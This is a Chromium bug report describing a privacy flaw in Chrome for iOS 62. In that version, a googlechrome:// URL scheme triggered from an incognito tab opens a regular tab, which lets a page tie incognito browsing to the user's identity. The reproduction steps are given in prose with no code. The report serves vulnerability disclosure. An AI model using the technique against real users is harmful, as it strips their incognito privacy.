This template is ONLY for reporting privacy issues. Please use a different
template for other types of bug reports.

Please see http://www.chromium.org/Home/chromium-privacy for further
information.


PRIVACY ISSUE

Google Chrome for iOS supports URL Schemes which launch other applications with data, including itself using the googlechrome:// URL Scheme. This allows a tab within Google Chrome to open another tab within the app, and by default this tab is a regular, non-incognito tab. If a webpage opens a googlechrome:// URL Scheme link in incognito mode, the app still opens this link in a regular, non-incognito tab despite the originating tab being incongntio. This allows an incognito webpage to gain additional identity information about a user with zero user interaction by forcibly opening a non-incognito tab.

VERSION:
Chrome Version: 62.0.3202.70 stable
Operating System: Chrome iOS

REPRODUCTION STEPS
  1. Create a web page with a googlechrome:// URL schema in (either by button click or automatic redirect)
  2. Open this page in incognito mode
  3. Trigger the URL schema
  4. The URL opens in a regular, non-incognito tab.

This has privacy implications because with the assistance of server-side code, the incognito tab could get access to all identity data a regular tab has access to.